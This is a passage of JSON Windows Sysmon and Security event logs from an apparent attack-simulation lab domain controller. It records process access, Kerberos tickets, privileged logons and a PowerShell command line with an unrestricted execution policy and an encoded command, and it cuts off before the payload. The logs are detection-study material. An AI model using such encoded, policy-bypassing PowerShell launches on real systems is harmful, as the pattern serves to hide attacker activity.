C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.361","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20CD-5F25-0000-00108FB10700}","TargetProcessId":"4652","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4882,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.377\r\nProcessGuid: {41C8662E-20CD-5F25-0000-00108FB10700}\r\nProcessId: 4652\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_5z0f0t50.ki3.ps1\r\nCreationUtcTime: 2020-08-01 07:59:09.377","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.377","ProcessGuid":"{41C8662E-20CD-5F25-0000-00108FB10700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_5z0f0t50.ki3.ps1","CreationUtcTime":"2020-08-01 07:59:09.377","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4883,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.408\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20CD-5F25-0000-00108FB10700}\r\nTargetProcessId: 4652\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.408","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20CD-5F25-0000-00108FB10700}","TargetProcessId":"4652","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4884,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.408\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20CD-5F25-0000-00108FB10700}\r\nTargetProcessId: 4652\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.408","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20CD-5F25-0000-00108FB10700}","TargetProcessId":"4652","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4885,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.471\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.471","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220553,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220554,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{40EAEECF-64DC-C99D-2812-C18FD1E8F572}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{40EAEECF-64DC-C99D-2812-C18FD1E8F572}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220555,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{40EAEECF-64DC-C99D-2812-C18FD1E8F572}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{40EAEECF-64DC-C99D-2812-C18FD1E8F572}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220556,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7BDBF\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{40EAEECF-64DC-C99D-2812-C18FD1E8F572}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7bdbf","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{40EAEECF-64DC-C99D-2812-C18FD1E8F572}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220557,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7BDBF\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x7bdbf","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4886,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.475\r\nProcessGuid: {41C8662E-20CD-5F25-0000-0010D7BD0700}\r\nProcessId: 3152\r\nImage: C:\\Windows\\System32\\chcp.com\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Change CodePage Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CHCP.COM\r\nCommandLine: \"C:\\Windows\\system32\\chcp.com\" 65001\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CD-5F25-0000-002017A10700}\r\nLogonId: 0x7A117\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD\r\nParentProcessGuid: {41C8662E-20CD-5F25-0000-00108FB10700}\r\nParentProcessId: 4652\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 